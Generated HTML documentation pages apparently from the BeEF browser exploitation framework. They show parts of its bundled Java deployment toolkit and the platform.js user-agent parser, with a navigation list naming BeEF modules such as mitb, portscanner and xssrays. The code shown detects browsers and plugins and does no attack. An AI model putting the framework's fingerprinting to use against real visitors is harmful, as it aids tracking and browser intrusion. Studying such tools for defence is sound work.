'<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' +
'<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' +
'<' + '/' + 'object' + '>';
} else if (browser == 'Netscape Family') {
launchTag = '<' +
'embed type="application/x-java-applet;jpi-version=' +
this.firefoxJavaVersion + '" ' +
'width="0" height="0" ' +
'launchjnlp="' + jnlp + '"' +
'docbase="' + jnlpDocbase + '"' +
' />';
}
if (document.body == 'undefined' || document.body == null) {
document.write(launchTag);
// go back to original page, otherwise current page becomes blank
document.location = jnlpDocbase;
} else {
var divTag = document.createElement("div");
divTag.id = "div1";
divTag.style.position = "relative";
divTag.style.left = "-10000px";
divTag.style.margin = "0px auto";
divTag.className ="dynamicDiv";
divTag.innerHTML = launchTag;
document.body.appendChild(divTag);
}
},
createWebStartLaunchButtonEx: function(jnlp, minimumVersion) {
if (this.returnPage == null) {
// if there is an install, come back and run the jnlp file
this.returnPage = jnlp;
}
var url = 'javascript:deployJava.launchWebStartApplication(\'' + jnlp +
'\');';
document.write('<' + 'a href="' + url +
'" onMouseOver="window.status=\'\'; ' +
'return true;"><' + 'img ' +
'src="' + this.launchButtonPNG + '" ' +
'border="0" /><' + '/' + 'a' + '>');
},
/**
* Outputs a launch button for the specified JNLP URL. When clicked, the
* button will ensure that an appropriate JRE is installed and then launch
* the JNLP application. minimumVersion is of the form #[.#[.#[_#]]], and
* is the minimum JRE version necessary to run this JNLP application.
* minimumVersion is optional, and if it is not specified, '1.4.2'
* will be used.
* If an appropriate JRE or Web Start installation is detected,
* the JNLP application will be launched, otherwise installLatestJRE()
* will be called.
*
* After installLatestJRE() is called, the script will attempt to detect
* that the JRE installation has completed and launch the JNLP application,
* but there are circumstances (such as when the JRE installation
* requires a browser restart) when this cannot be fulfilled.
*/
createWebStartLaunchButton: function(jnlp, minimumVersion) {
if (this.returnPage == null) {
// if there is an install, come back and run the jnlp file
this.returnPage = jnlp;
}
var url = 'javascript:' +
'if (!deployJava.isWebStartInstalled(&quot;' +
minimumVersion + '&quot;)) {' +
'if (deployJava.installLatestJRE()) {' +
'if (deployJava.launch(&quot;' + jnlp + '&quot;)) {}' +
'}' +
'} else {' +
'if (deployJava.launch(&quot;' + jnlp + '&quot;)) {}' +
'}';
document.write('<' + 'a href="' + url +
'" onMouseOver="window.status=\'\'; ' +
'return true;"><' + 'img ' +
'src="' + this.launchButtonPNG + '" ' +
'border="0" /><' + '/' + 'a' + '>');
},
/**
* Launch a JNLP application, (using the plugin if available)
*/
launch: function(jnlp) {
/*
* Using the plugin to launch Java Web Start is disabled for the time being
*/
document.location=jnlp;
return true;
},
/*
* returns true if the ActiveX or XPI plugin is installed
*/
isPluginInstalled: function() {
var plugin = this.getPlugin();
if (plugin && plugin.jvms) {
return true;
} else {
return false;
}
},
/*
* returns true if the plugin is installed and AutoUpdate is enabled
*/
isAutoUpdateEnabled: function() {
if (this.isPluginInstalled()) {
return this.getPlugin().isAutoUpdateEnabled();
}
return false;
},
/*
* sets AutoUpdate on if plugin is installed
*/
setAutoUpdateEnabled: function() {
if (this.isPluginInstalled()) {
return this.getPlugin().setAutoUpdateEnabled();
}
return false;
},
/*
* sets the preferred install type : null, online, kernel
*/
setInstallerType: function(type) {
this.installType = type;
if (this.isPluginInstalled()) {
return this.getPlugin().setInstallerType(type);
}
return false;
},
/*
* sets additional package list - to be used by kernel installer
*/
setAdditionalPackages: function(packageList) {
if (this.isPluginInstalled()) {
return this.getPlugin().setAdditionalPackages(
packageList);
}
return false;
},
/*
* sets preference to install Early Access versions if available
*/
setEarlyAccess: function(enabled) {
this.EAInstallEnabled = enabled;
},
/*
* Determines if the next generation plugin (Plugin II) is default
*/
isPlugin2: function() {
if (this.isPluginInstalled()) {
if (this.versionCheck('1.6.0_10+')) {
try {
return this.getPlugin().isPlugin2();
} catch (err) {
// older plugin w/o isPlugin2() function -
}
}
}
return false;
},
//support native DT plugin?
allowPlugin: function() {
this.getBrowser();
// Safari and Opera browsers find the plugin but it
// doesn't work, so until we can get it to work - don't use it.
var ret = ('Safari' != this.browserName2 &&
'Opera' != this.browserName2);
return ret;
},
getPlugin: function() {
this.refresh();
var ret = null;
if (this.allowPlugin()) {
ret = document.getElementById('deployJavaPlugin');
}
return ret;
},
compareVersionToPattern: function(version, patternArray,
familyMatch, minMatch) {
if (version == undefined || patternArray == undefined) {
return false;
}
var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
var matchData = version.match(regex);
if (matchData != null) {
var index = 0;
var result = new Array();
for (var i = 1; i < matchData.length; ++i) {
if ((typeof matchData[i] == 'string') && (matchData[i] != ''))
{
result[index] = matchData[i];
index++;
}
}
var l = Math.min(result.length, patternArray.length);
// result contains what is installed in local machine
// patternArray is what is being requested by application
if (minMatch) {
// minimum version match, return true if what we have (installed)
// is greater or equal to what is requested. false otherwise.
for (var i = 0; i < l; ++i) {
if (result[i] < patternArray[i]) {
return false;
} else if (result[i] > patternArray[i]) {
return true;
}
}
return true;
} else {
for (var i = 0; i < l; ++i) {
if (result[i] != patternArray[i]) return false;
}
if (familyMatch) {
// family match - return true as long as what we have
// (installed) matches up to the request pattern
return true;
} else {
// exact match
// result and patternArray needs to have exact same content
return (result.length == patternArray.length);
}
}
} else {
return false;
}
},
getBrowser: function() {
if (this.browserName == null) {
var browser = navigator.userAgent.toLowerCase();
log('[getBrowser()] navigator.userAgent.toLowerCase() -> ' + browser);
// order is important here. Safari userAgent contains mozilla,
// and Chrome userAgent contains both mozilla and safari.
if ((browser.indexOf('msie') != -1) && (browser.indexOf('opera') == -1)) {
this.browserName = 'MSIE';
this.browserName2 = 'MSIE';
} else if (browser.indexOf('iphone') != -1) {
// this included both iPhone and iPad
this.browserName = 'Netscape Family';
this.browserName2 = 'iPhone';
} else if ((browser.indexOf('firefox') != -1) && (browser.indexOf('opera') == -1)) {
this.browserName = 'Netscape Family';
this.browserName2 = 'Firefox';
} else if (browser.indexOf('chrome') != -1) {
this.browserName = 'Netscape Family';
this.browserName2 = 'Chrome';
} else if (browser.indexOf('safari') != -1) {
this.browserName = 'Netscape Family';
this.browserName2 = 'Safari';
} else if ((browser.indexOf('mozilla') != -1) && (browser.indexOf('opera') == -1)) {
this.browserName = 'Netscape Family';
this.browserName2 = 'Other';
} else if (browser.indexOf('opera') != -1) {
this.browserName = 'Netscape Family';
this.browserName2 = 'Opera';
} else {
this.browserName = '?';
this.browserName2 = 'unknown';
}
log('[getBrowser()] Detected browser name:'+ this.browserName +
', ' + this.browserName2);
}
return this.browserName;
},
testUsingActiveX: function(version) {
var objectName = 'JavaWebStart.isInstalled.' + version + '.0';
// we need the typeof check here for this to run on FF/Chrome
// the check needs to be in place here - cannot even pass ActiveXObject
// as arg to another function
if (typeof ActiveXObject == 'undefined' || !ActiveXObject) {
log('[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?');
return false;
}
try {
return (new ActiveXObject(objectName) != null);
} catch (exception) {
return false;
}
},
testForMSVM: function() {
var clsid = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
if (typeof oClientCaps != 'undefined') {
var v = oClientCaps.getComponentVersion(clsid, "ComponentID");
if ((v == '') || (v == '5,0,5000,0')) {
return false;
} else {
return true;
}
} else {
return false;
}
},
testUsingMimeTypes: function(version) {
if (!navigator.mimeTypes) {
log ('[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?');
return false;
}
for (var i = 0; i < navigator.mimeTypes.length; ++i) {
s = navigator.mimeTypes[i].type;
var m = s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);
if (m != null) {
if (this.compareVersions(m[1], version)) {
return true;
}
}
}
return false;
},
testUsingPluginsArray: function(version) {
if ((!navigator.plugins) || (!navigator.plugins.length)) {
return false;
}
var platform = navigator.platform.toLowerCase();
for (var i = 0; i < navigator.plugins.length; ++i) {
s = navigator.plugins[i].description;
if (s.search(/^Java Switchable Plug-in (Cocoa)/) != -1) {
// Safari on MAC
if (this.compareVersions("1.5.0", version)) {
return true;
}
} else if (s.search(/^Java/) != -1) {
if (platform.indexOf('win') != -1) {
// still can't tell - opera, safari on windows
// return true for 1.5.0 and 1.6.0
if (this.compareVersions("1.5.0", version) ||
this.compareVersions("1.6.0", version)) {
return true;
}
}
}
}
// if above dosn't work on Apple or Windows, just allow 1.5.0
if (this.compareVersions("1.5.0", version)) {
return true;
}
return false;
},
IEInstall: function() {
location.href = constructGetJavaURL(
((this.returnPage != null) ?
('&returnPage=' + this.returnPage) : '') +
((this.locale != null) ?
('&locale=' + this.locale) : '') +
((this.brand != null) ? ('&brand=' + this.brand) : ''));
// should not actually get here
return false;
},
done: function (name, result) {
},
FFInstall: function() {
location.href = constructGetJavaURL(
((this.returnPage != null) ?
('&returnPage=' + this.returnPage) : '') +
((this.locale != null) ?
('&locale=' + this.locale) : '') +
((this.brand != null) ? ('&brand=' + this.brand) : '') +
((this.installType != null) ?
('&type=' + this.installType) : ''));
// should not actually get here
return false;
},
// return true if 'installed' (considered as a JRE version string) is
// greater than or equal to 'required' (again, a JRE version string).
compareVersions: function(installed, required) {
var a = installed.split('.');
var b = required.split('.');
for (var i = 0; i < a.length; ++i) {
a[i] = Number(a[i]);
}
for (var i = 0; i < b.length; ++i) {
b[i] = Number(b[i]);
}
if (a.length == 2) {
a[2] = 0;
}
if (a[0] > b[0]) return true;
if (a[0] < b[0]) return false;
if (a[1] > b[1]) return true;
if (a[1] < b[1]) return false;
if (a[2] > b[2]) return true;
if (a[2] < b[2]) return false;
return true;
},
enableAlerts: function() {
// reset this so we can show the browser detection
this.browserName = null;
this.debug = true;
},
poll: function() {
this.refresh();
var postInstallJREList = this.getJREs();
if ((this.preInstallJREList.length == 0) &&
(postInstallJREList.length != 0)) {
clearInterval(this.myInterval);
if (this.returnPage != null) {
location.href = this.returnPage;
};
}
if ((this.preInstallJREList.length != 0) &&
(postInstallJREList.length != 0) &&
(this.preInstallJREList[0] != postInstallJREList[0])) {
clearInterval(this.myInterval);
if (this.returnPage != null) {
location.href = this.returnPage;
}
}
},
writePluginTag: function() {
var browser = this.getBrowser();
if (browser == 'MSIE') {
document.write('<' +
'object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" ' +
'id="deployJavaPlugin" width="0" height="0">' +
'<' + '/' + 'object' + '>');
} else if (browser == 'Netscape Family' && this.allowPlugin()) {
this.writeEmbedTag();
}
},
refresh: function() {
navigator.plugins.refresh(false);
var browser = this.getBrowser();
if (browser == 'Netscape Family' && this.allowPlugin()) {
var plugin = document.getElementById('deployJavaPlugin');
// only do this again if no plugin
if (plugin == null) {
this.writeEmbedTag();
}
}
},
writeEmbedTag: function() {
var written = false;
if (navigator.mimeTypes != null) {
for (var i=0; i < navigator.mimeTypes.length; i++) {
if (navigator.mimeTypes[i].type == this.mimeType) {
if (navigator.mimeTypes[i].enabledPlugin) {
document.write('<' +
'embed id="deployJavaPlugin" type="' +
this.mimeType + '" hidden="true" />');
written = true;
}
}
}
// if we ddn't find new mimeType, look for old mimeType
if (!written) for (var i=0; i < navigator.mimeTypes.length; i++) {
if (navigator.mimeTypes[i].type == this.oldMimeType) {
if (navigator.mimeTypes[i].enabledPlugin) {
document.write('<' +
'embed id="deployJavaPlugin" type="' +
this.oldMimeType + '" hidden="true" />');
}
}
}
}
}
}; // deployJava object
rv.writePluginTag();
if (rv.locale == null) {
var loc = null;
if (loc == null) try {
loc = navigator.userLanguage;
} catch (err) { }
if (loc == null) try {
loc = navigator.systemLanguage;
} catch (err) { }
if (loc == null) try {
loc = navigator.language;
} catch (err) { }
if (loc != null) {
loc.replace("-","_")
rv.locale = loc;
}
}
return rv;
}();
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/lib_platform.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: lib/platform.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: lib/platform.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>/**
* Platform.js
* Copyright 2014-2018 Benjamin Tan
* Copyright 2011-2013 John-David Dalton
* Available under MIT license
* @namespace platform
*/
;(function() {
'use strict';
/** Used to determine if values are of the language type `Object`. */
var objectTypes = {
'function': true,
'object': true
};
/** Used as a reference to the global object. */
var root = (objectTypes[typeof window] && window) || this;
/** Backup possible global object. */
var oldRoot = root;
/** Detect free variable `exports`. */
var freeExports = objectTypes[typeof exports] && exports;
/** Detect free variable `module`. */
var freeModule = objectTypes[typeof module] && module && !module.nodeType && module;
/** Detect free variable `global` from Node.js or Browserified code and use it as `root`. */
var freeGlobal = freeExports && freeModule && typeof global == 'object' && global;
if (freeGlobal && (freeGlobal.global === freeGlobal || freeGlobal.window === freeGlobal || freeGlobal.self === freeGlobal)) {
root = freeGlobal;
}
/**
* Used as the maximum length of an array-like object.
* See the [ES6 spec](http://people.mozilla.org/~jorendorff/es6-draft.html#sec-tolength)
* for more details.
*/
var maxSafeInteger = Math.pow(2, 53) - 1;
/** Regular expression to detect Opera. */
var reOpera = /\bOpera/;
/** Possible global object. */
var thisBinding = this;
/** Used for native method references. */
var objectProto = Object.prototype;
/** Used to check for own properties of an object. */
var hasOwnProperty = objectProto.hasOwnProperty;
/** Used to resolve the internal `[[Class]]` of values. */
var toString = objectProto.toString;
/*--------------------------------------------------------------------------*/
/**
* Capitalizes a string value.
*
* @private
* @param {string} string The string to capitalize.
* @returns {string} The capitalized string.
*/
function capitalize(string) {
string = String(string);
return string.charAt(0).toUpperCase() + string.slice(1);
}
/**
* A utility function to clean up the OS name.
*
* @private
* @param {string} os The OS name to clean up.
* @param {string} [pattern] A `RegExp` pattern matching the OS name.
* @param {string} [label] A label for the OS.
*/
function cleanupOS(os, pattern, label) {
// Platform tokens are defined at:
// http://msdn.microsoft.com/en-us/library/ms537503(VS.85).aspx
// http://web.archive.org/web/20081122053950/http://msdn.microsoft.com/en-us/library/ms537503(VS.85).aspx
var data = {
'10.0': '10',
'6.4': '10 Technical Preview',
'6.3': '8.1',
'6.2': '8',
'6.1': 'Server 2008 R2 / 7',
'6.0': 'Server 2008 / Vista',
'5.2': 'Server 2003 / XP 64-bit',
'5.1': 'XP',
'5.01': '2000 SP1',
'5.0': '2000',
'4.0': 'NT',
'4.90': 'ME'
};
// Detect Windows version from platform tokens.
if (pattern && label && /^Win/i.test(os) && !/^Windows Phone /i.test(os) &&
(data = data[/[\d.]+$/.exec(os)])) {
os = 'Windows ' + data;
}
// Correct character case and cleanup string.
os = String(os);
if (pattern && label) {
os = os.replace(RegExp(pattern, 'i'), label);
}
os = format(
os.replace(/ ce$/i, ' CE')
.replace(/\bhpw/i, 'web')
.replace(/\bMacintosh\b/, 'Mac OS')
.replace(/_PowerPC\b/i, ' OS')
.replace(/\b(OS X) [^ \d]+/i, '$1')
.replace(/\bMac (OS X)\b/, '$1')
.replace(/\/(\d)/, ' $1')
.replace(/_/g, '.')
.replace(/(?: BePC|[ .]*fc[ \d.]+)$/i, '')
.replace(/\bx86\.64\b/gi, 'x86_64')
.replace(/\b(Windows Phone) OS\b/, '$1')
.replace(/\b(Chrome OS \w+) [\d.]+\b/, '$1')
.split(' on ')[0]
);
return os;
}
/**
* An iteration utility for arrays and objects.
*
* @private
* @param {Array|Object} object The object to iterate over.
* @param {Function} callback The function called per iteration.
*/
function each(object, callback) {
var index = -1,
length = object ? object.length : 0;
if (typeof length == 'number' && length > -1 && length <= maxSafeInteger) {
while (++index < length) {
callback(object[index], index, object);
}
} else {
forOwn(object, callback);
}
}
/**
* Trim and conditionally capitalize string values.
*
* @private
* @param {string} string The string to format.
* @returns {string} The formatted string.
*/
function format(string) {
string = trim(string);
return /^(?:webOS|i(?:OS|P))/.test(string)
? string
: capitalize(string);
}
/**
* Iterates over an object's own properties, executing the `callback` for each.
*
* @private
* @param {Object} object The object to iterate over.
* @param {Function} callback The function executed per own property.
*/
function forOwn(object, callback) {
for (var key in object) {
if (hasOwnProperty.call(object, key)) {
callback(object[key], key, object);
}
}
}
/**
* Gets the internal `[[Class]]` of a value.
*
* @private
* @param {*} value The value.
* @returns {string} The `[[Class]]`.
*/
function getClassOf(value) {
return value == null
? capitalize(value)
: toString.call(value).slice(8, -1);
}
/**
* Host objects can return type values that are different from their actual
* data type. The objects we are concerned with usually return non-primitive
* types of "object", "function", or "unknown".
*
* @private
* @param {*} object The owner of the property.
* @param {string} property The property to check.
* @returns {boolean} Returns `true` if the property value is a non-primitive, else `false`.
*/
function isHostType(object, property) {
var type = object != null ? typeof object[property] : 'number';
return !/^(?:boolean|number|string|undefined)$/.test(type) &&
(type == 'object' ? !!object[property] : true);
}
/**
* Prepares a string for use in a `RegExp` by making hyphens and spaces optional.
*
* @private
* @param {string} string The string to qualify.
* @returns {string} The qualified string.
*/
function qualify(string) {
return String(string).replace(/([ -])(?!$)/g, '$1?');
}
/**
* A bare-bones `Array#reduce` like utility function.
*
* @private
* @param {Array} array The array to iterate over.
* @param {Function} callback The function called per iteration.
* @returns {*} The accumulated result.
*/
function reduce(array, callback) {
var accumulator = null;
each(array, function(value, index) {
accumulator = callback(accumulator, value, index, array);
});
return accumulator;
}
/**
* Removes leading and trailing whitespace from a string.
*
* @private
* @param {string} string The string to trim.
* @returns {string} The trimmed string.
*/
function trim(string) {
return String(string).replace(/^ +| +$/g, '');
}
/*--------------------------------------------------------------------------*/
/**
* Creates a new platform object.
*
* @memberOf platform
* @param {Object|string} [ua=navigator.userAgent] The user agent string or
* context object.
* @returns {Object} A platform object.
*/
function parse(ua) {
/** The environment context object. */
var context = root;
/** Used to flag when a custom context is provided. */
var isCustomContext = ua && typeof ua == 'object' && getClassOf(ua) != 'String';
// Juggle arguments.
if (isCustomContext) {
context = ua;
ua = null;
}
/** Browser navigator object. */
var nav = context.navigator || {};
/** Browser user agent string. */
var userAgent = nav.userAgent || '';
ua || (ua = userAgent);
/** Used to flag when `thisBinding` is the [ModuleScope]. */
var isModuleScope = isCustomContext || thisBinding == oldRoot;
/** Used to detect if browser is like Chrome. */
var likeChrome = isCustomContext
? !!nav.likeChrome
: /\bChrome\b/.test(ua) && !/internal|\n/i.test(toString.toString());
/** Internal `[[Class]]` value shortcuts. */
var objectClass = 'Object',
airRuntimeClass = isCustomContext ? objectClass : 'ScriptBridgingProxyObject',
enviroClass = isCustomContext ? objectClass : 'Environment',
javaClass = (isCustomContext && context.java) ? 'JavaPackage' : getClassOf(context.java),
phantomClass = isCustomContext ? objectClass : 'RuntimeObject';
/** Detect Java environments. */
var java = /\bJava/.test(javaClass) && context.java;
/** Detect Rhino. */
var rhino = java && getClassOf(context.environment) == enviroClass;
/** A character to represent alpha. */
var alpha = java ? 'a' : '\u03b1';
/** A character to represent beta. */
var beta = java ? 'b' : '\u03b2';
/** Browser document object. */
var doc = context.document || {};
/**
* Detect Opera browser (Presto-based).
* http://www.howtocreate.co.uk/operaStuff/operaObject.html
* http://dev.opera.com/articles/view/opera-mini-web-content-authoring-guidelines/#operamini
*/
var opera = context.operamini || context.opera;
/** Opera `[[Class]]`. */
var operaClass = reOpera.test(operaClass = (isCustomContext && opera) ? opera['[[Class]]'] : getClassOf(opera))
? operaClass
: (opera = null);
/*------------------------------------------------------------------------*/
/** Temporary variable used over the script's lifetime. */
var data;
/** The CPU architecture. */
var arch = ua;
/** Platform description array. */
var description = [];
/** Platform alpha/beta indicator. */
var prerelease = null;
/** A flag to indicate that environment features should be used to resolve the platform. */
var useFeatures = ua == userAgent;
/** The browser/environment version. */
var version = useFeatures && opera && typeof opera.version == 'function' && opera.version();
/** A flag to indicate if the OS ends with "/ Version" */
var isSpecialCasedOS;
/* Detectable layout engines (order is important). */
var layout = getLayout([
{ 'label': 'EdgeHTML', 'pattern': '(?:Edge|EdgA|EdgiOS)' },
'Trident',
{ 'label': 'WebKit', 'pattern': 'AppleWebKit' },
'iCab',
'Presto',
'NetFront',
'Tasman',
'KHTML',
'Gecko'
]);
/* Detectable browser names (order is important). */
var name = getName([
'Adobe AIR',
'Arora',
'Avant Browser',
'Breach',
'Camino',
'Electron',
'Epiphany',
'Fennec',
'Flock',
'Galeon',
'GreenBrowser',
'iCab',
'Iceweasel',
'K-Meleon',
'Konqueror',
'Lunascape',
'Maxthon',
{ 'label': 'Microsoft Edge', 'pattern': '(?:Edge|EdgA|EdgiOS)' },
'Midori',
'Nook Browser',
'PaleMoon',
'PhantomJS',
'Raven',
'Rekonq',
'RockMelt',
{ 'label': 'Samsung Internet', 'pattern': 'SamsungBrowser' },
'SeaMonkey',
{ 'label': 'Silk', 'pattern': '(?:Cloud9|Silk-Accelerated)' },
'Sleipnir',
'SlimBrowser',
{ 'label': 'SRWare Iron', 'pattern': 'Iron' },
'Sunrise',
'Swiftfox',
'Waterfox',
'WebPositive',
'Opera Mini',
{ 'label': 'Opera Mini', 'pattern': 'OPiOS' },
'Opera',
{ 'label': 'Opera', 'pattern': 'OPR' },
'Chrome',
{ 'label': 'Chrome Mobile', 'pattern': '(?:CriOS|CrMo)' },
{ 'label': 'Firefox', 'pattern': '(?:Firefox|Minefield)' },
{ 'label': 'Firefox for iOS', 'pattern': 'FxiOS' },
{ 'label': 'IE', 'pattern': 'IEMobile' },
{ 'label': 'IE', 'pattern': 'MSIE' },
'Safari'
]);
/* Detectable products (order is important). */
var product = getProduct([
{ 'label': 'BlackBerry', 'pattern': 'BB10' },
'BlackBerry',
{ 'label': 'Galaxy S', 'pattern': 'GT-I9000' },
{ 'label': 'Galaxy S2', 'pattern': 'GT-I9100' },
{ 'label': 'Galaxy S3', 'pattern': 'GT-I9300' },
{ 'label': 'Galaxy S4', 'pattern': 'GT-I9500' },
{ 'label': 'Galaxy S5', 'pattern': 'SM-G900' },
{ 'label': 'Galaxy S6', 'pattern': 'SM-G920' },
{ 'label': 'Galaxy S6 Edge', 'pattern': 'SM-G925' },
{ 'label': 'Galaxy S7', 'pattern': 'SM-G930' },
{ 'label': 'Galaxy S7 Edge', 'pattern': 'SM-G935' },
'Google TV',
'Lumia',
'iPad',
'iPod',
'iPhone',
'Kindle',
{ 'label': 'Kindle Fire', 'pattern': '(?:Cloud9|Silk-Accelerated)' },
'Nexus',
'Nook',
'PlayBook',
'PlayStation Vita',
'PlayStation',
'TouchPad',
'Transformer',
{ 'label': 'Wii U', 'pattern': 'WiiU' },
'Wii',
'Xbox One',
{ 'label': 'Xbox 360', 'pattern': 'Xbox' },
'Xoom'
]);
/* Detectable manufacturers. */
var manufacturer = getManufacturer({
'Apple': { 'iPad': 1, 'iPhone': 1, 'iPod': 1 },
'Archos': {},
'Amazon': { 'Kindle': 1, 'Kindle Fire': 1 },
'Asus': { 'Transformer': 1 },
'Barnes & Noble': { 'Nook': 1 },
'BlackBerry': { 'PlayBook': 1 },
'Google': { 'Google TV': 1, 'Nexus': 1 },
'HP': { 'TouchPad': 1 },
'HTC': {},
'LG': {},
'Microsoft': { 'Xbox': 1, 'Xbox One': 1 },
'Motorola': { 'Xoom': 1 },
'Nintendo': { 'Wii U': 1, 'Wii': 1 },
'Nokia': { 'Lumia': 1 },
'Samsung': { 'Galaxy S': 1, 'Galaxy S2': 1, 'Galaxy S3': 1, 'Galaxy S4': 1 },
'Sony': { 'PlayStation': 1, 'PlayStation Vita': 1 }
});
/* Detectable operating systems (order is important). */
var os = getOS([
'Windows Phone',
'Android',
'CentOS',
{ 'label': 'Chrome OS', 'pattern': 'CrOS' },
'Debian',
'Fedora',
'FreeBSD',
'Gentoo',
'Haiku',
'Kubuntu',
'Linux Mint',
'OpenBSD',
'Red Hat',
'SuSE',
'Ubuntu',
'Xubuntu',
'Cygwin',
'Symbian OS',
'hpwOS',
'webOS ',
'webOS',
'Tablet OS',
'Tizen',
'Linux',
'Mac OS X',
'Macintosh',
'Mac',
'Windows 98;',
'Windows '
]);
/*------------------------------------------------------------------------*/
/**
* Picks the layout engine from an array of guesses.
*
* @private
* @param {Array} guesses An array of guesses.
* @returns {null|string} The detected layout engine.
*/
function getLayout(guesses) {
return reduce(guesses, function(result, guess) {
return result || RegExp('\\b' + (
guess.pattern || qualify(guess)
) + '\\b', 'i').exec(ua) && (guess.label || guess);
});
}
/**
* Picks the manufacturer from an array of guesses.
*
* @private
* @param {Array} guesses An object of guesses.
* @returns {null|string} The detected manufacturer.
*/
function getManufacturer(guesses) {
return reduce(guesses, function(result, value, key) {
// Lookup the manufacturer by product or scan the UA for the manufacturer.
return result || (
value[product] ||
value[/^[a-z]+(?: +[a-z]+\b)*/i.exec(product)] ||
RegExp('\\b' + qualify(key) + '(?:\\b|\\w*\\d)', 'i').exec(ua)
) && key;
});
}
/**
* Picks the browser name from an array of guesses.
*
* @private
* @param {Array} guesses An array of guesses.
* @returns {null|string} The detected browser name.
*/
function getName(guesses) {
return reduce(guesses, function(result, guess) {
return result || RegExp('\\b' + (
guess.pattern || qualify(guess)
) + '\\b', 'i').exec(ua) && (guess.label || guess);
});
}
/**
* Picks the OS name from an array of guesses.
*
* @private
* @param {Array} guesses An array of guesses.
* @returns {null|string} The detected OS name.
*/
function getOS(guesses) {
return reduce(guesses, function(result, guess) {
var pattern = guess.pattern || qualify(guess);
if (!result && (result =
RegExp('\\b' + pattern + '(?:/[\\d.]+|[ \\w.]*)', 'i').exec(ua)
)) {
result = cleanupOS(result, pattern, guess.label || guess);
}
return result;
});
}
/**
* Picks the product name from an array of guesses.
*
* @private
* @param {Array} guesses An array of guesses.
* @returns {null|string} The detected product name.
*/
function getProduct(guesses) {
return reduce(guesses, function(result, guess) {
var pattern = guess.pattern || qualify(guess);
if (!result && (result =
RegExp('\\b' + pattern + ' *\\d+[.\\w_]*', 'i').exec(ua) ||
RegExp('\\b' + pattern + ' *\\w+-[\\w]*', 'i').exec(ua) ||
RegExp('\\b' + pattern + '(?:; *(?:[a-z]+[_-])?[a-z]+\\d+|[^ ();-]*)', 'i').exec(ua)
)) {
// Split by forward slash and append product version if needed.
if ((result = String((guess.label && !RegExp(pattern, 'i').test(guess.label)) ? guess.label : result).split('/'))[1] && !/[\d.]+/.test(result[0])) {
result[0] += ' ' + result[1];
}
// Correct character case and cleanup string.
guess = guess.label || guess;
result = format(result[0]
.replace(RegExp(pattern, 'i'), guess)
.replace(RegExp('; *(?:' + guess + '[_-])?', 'i'), ' ')
.replace(RegExp('(' + guess + ')[-_.]?(\\w)', 'i'), '$1 $2'));
}
return result;
});
}
/**
* Resolves the version using an array of UA patterns.
*
* @private
* @param {Array} patterns An array of UA patterns.
* @returns {null|string} The detected version.
*/
function getVersion(patterns) {
return reduce(patterns, function(result, pattern) {
return result || (RegExp(pattern +
'(?:-[\\d.]+/|(?: for [\\w-]+)?[ /-])([\\d.]+[^ ();/_-]*)', 'i').exec(ua) || 0)[1] || null;
});
}
/**
* Returns `platform.description` when the platform object is coerced to a string.
*
* @name toString
* @memberOf platform
* @returns {string} Returns `platform.description` if available, else an empty string.
*/
function toStringPlatform() {
return this.description || '';
}
/*------------------------------------------------------------------------*/
// Convert layout to an array so we can add extra details.
layout && (layout = [layout]);
// Detect product names that contain their manufacturer's name.
if (manufacturer && !product) {
product = getProduct([manufacturer]);
}
// Clean up Google TV.
if ((data = /\bGoogle TV\b/.exec(product))) {
product = data[0];
}
// Detect simulators.
if (/\bSimulator\b/i.test(ua)) {
product = (product ? product + ' ' : '') + 'Simulator';
}
// Detect Opera Mini 8+ running in Turbo/Uncompressed mode on iOS.
if (name == 'Opera Mini' && /\bOPiOS\b/.test(ua)) {
description.push('running in Turbo/Uncompressed mode');
}
// Detect IE Mobile 11.
if (name == 'IE' && /\blike iPhone OS\b/.test(ua)) {
data = parse(ua.replace(/like iPhone OS/, ''));
manufacturer = data.manufacturer;
product = data.product;
}
